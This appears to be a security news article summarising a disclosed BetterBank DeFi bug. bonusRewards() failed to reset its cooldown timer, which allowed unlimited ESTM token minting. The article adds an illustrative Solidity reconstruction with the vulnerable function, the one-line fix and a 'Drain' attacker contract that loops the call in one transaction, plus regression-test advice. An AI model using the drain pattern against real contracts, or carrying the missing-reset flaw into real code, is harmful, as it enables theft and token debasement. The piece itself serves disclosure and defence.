Concise Cyber

BetterBank DeFi Flaw: How a Logic Error Led to Infinite ESTM Token Minting

A critical vulnerability was discovered within the smart contract of the BetterBank DeFi protocol by Kaspersky security researcher Georgy Zaytsev. The flaw, identified during a manual code review, resided in the reward distribution logic for the platform’s native ESTM token, creating a mechanism for unlimited token generation.

The Flaw in the Bonus Reward Function

The BetterBank protocol features two primary functions for reward distribution: claimRewards() and bonusRewards(). The bonusRewards() function was designed to grant users an additional 10% bonus on their rewards if they were claimed more than 24 hours after the previous claim. To enforce this time-lock, the contract used a variable named lastRewardClaimTime.

The vulnerability stemmed from an oversight in the code. While claimRewards() correctly updated lastRewardClaimTime after a successful claim, bonusRewards() read the variable to enforce the 24-hour check but never wrote it back. Claiming a bonus therefore did not reset the cooldown, so the function could be called again immediately.

Exploitation and Resolution

An attacker could exploit this logic error by calling bonusRewards() repeatedly in a loop from a single transaction. block.timestamp does not change within a transaction, so once the cooldown had elapsed every call in the loop passed the check, and each one granted the 10% bonus again without updating lastRewardClaimTime. The amount of ESTM minted this way was bounded only by the gas the attacker was willing to spend, and such uncontrolled minting would have severely devalued the token.

Upon discovering the flaw, Kaspersky reported the issue to the BetterBank developers. The development team acknowledged the vulnerability and implemented a fix. The resolution involved adding the line lastRewardClaimTime = block.timestamp; to the bonusRewards() function. This correction ensures that the cooldown timer is properly reset after a bonus claim, mirroring the logic of the main rewards function and preventing the exploit.
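To make the bug and the one-line fix concrete, here is an illustrative reconstruction written for this summary. It is not BetterBank's contract: the staking model (rewards accruing per second of stake at a fixed rate), the per-user mapping for lastRewardClaimTime, the stand-in _mint, and the Drain attacker contract are all assumptions made so that the vulnerable function, the fixed function and the looping exploit can be shown side by side.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Illustrative reconstruction of the flaw described above, NOT BetterBank's code.
// Assumptions (not from the write-up): rewards accrue per second of stake at
// REWARD_RATE, lastRewardClaimTime is kept per user, and _mint stands in for
// minting ESTM.
contract RewardsVulnerable {
    uint256 public constant BONUS_COOLDOWN = 24 hours;
    uint256 public constant BONUS_BPS = 1_000;      // 10% bonus, in basis points
    uint256 public constant REWARD_RATE = 1e15;     // assumed reward per staked unit per second, 1e18-scaled

    mapping(address => uint256) public staked;
    mapping(address => uint256) public lastRewardClaimTime;
    mapping(address => uint256) public balanceOf;   // stand-in for the ESTM balance

    function stake(uint256 amount) external {
        // Real code would pull tokens in; this stand-in only records the position.
        if (staked[msg.sender] == 0) lastRewardClaimTime[msg.sender] = block.timestamp;
        staked[msg.sender] += amount;
    }

    // Rewards accrued since the user's last claim.
    function pendingRewards(address user) public view returns (uint256) {
        uint256 elapsed = block.timestamp - lastRewardClaimTime[user];
        return staked[user] * elapsed * REWARD_RATE / 1e18;
    }

    // Correct: the timer is reset, so the same accrual cannot be paid twice.
    function claimRewards() external {
        uint256 amount = pendingRewards(msg.sender);
        lastRewardClaimTime[msg.sender] = block.timestamp;
        _mint(msg.sender, amount);
    }

    // Vulnerable: reads lastRewardClaimTime for the cooldown check but never writes it.
    function bonusRewards() external virtual {
        require(block.timestamp - lastRewardClaimTime[msg.sender] > BONUS_COOLDOWN, "cooldown");
        uint256 amount = pendingRewards(msg.sender);
        uint256 bonus = amount * BONUS_BPS / 10_000;
        // BUG: `lastRewardClaimTime[msg.sender] = block.timestamp;` is missing here,
        // so the check passes and the same accrual is paid again on the next call.
        _mint(msg.sender, amount + bonus);
    }

    function _mint(address to, uint256 amount) internal {
        balanceOf[to] += amount;
    }
}

// The fix reported in the write-up: one line added to bonusRewards().
contract RewardsFixed is RewardsVulnerable {
    function bonusRewards() external override {
        require(block.timestamp - lastRewardClaimTime[msg.sender] > BONUS_COOLDOWN, "cooldown");
        uint256 amount = pendingRewards(msg.sender);
        uint256 bonus = amount * BONUS_BPS / 10_000;
        lastRewardClaimTime[msg.sender] = block.timestamp;   // the fix: reset the cooldown
        _mint(msg.sender, amount + bonus);
    }
}

// Attacker (assumed): stakes, waits out one real cooldown, then loops inside a
// single transaction. block.timestamp is constant for the whole transaction, so
// against RewardsVulnerable every iteration passes the check and mints
// amount + bonus again; against RewardsFixed the second iteration reverts.
contract Drain {
    RewardsVulnerable public immutable target;

    constructor(RewardsVulnerable _target) {
        target = _target;
    }

    function setup(uint256 amount) external {
        target.stake(amount);
    }

    // Call 24h+ after setup(). Bounded only by the block gas limit.
    function run(uint256 iterations) external {
        for (uint256 i = 0; i < iterations; i++) {
            target.bonusRewards();
        }
    }
}
```

In a Foundry or Hardhat test, deploy RewardsVulnerable, point Drain at it, call setup(), advance the chain clock past 24 hours, and call run(50): balanceOf(Drain) grows by amount + bonus on every iteration because pendingRewards() never changes inside the transaction. Repeat against RewardsFixed and the second iteration reverts with "cooldown". That two-calls-in-one-block test is the regression check a review of any time-locked reward path should include: every function that reads a cooldown timestamp must also be the one that writes it, or the lock is decorative.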

All articles are written here with the help of AI on the basis of openly available information which cannot be independently verified. We do strive to quote the relevant sources. The intent is only to summarise what is already reported in public forums in our own words, with no intention to plagiarise or copy other people's work. The publisher has no intent to defame or cause offence to anyone, any person or any organisation at any moment. The publisher assumes no responsibility for any damage or loss caused by making decisions on the basis of whatever is published on cyberconcise.com. You are advised to do your own checks and balances before making any decision, and owners and publishers at cyberconcise.com cannot be held accountable for its resulting ramifications. If you have any objections or concerns, or want to point out anything factually incorrect, please reach out using the form on https://concisecyber.com/about/
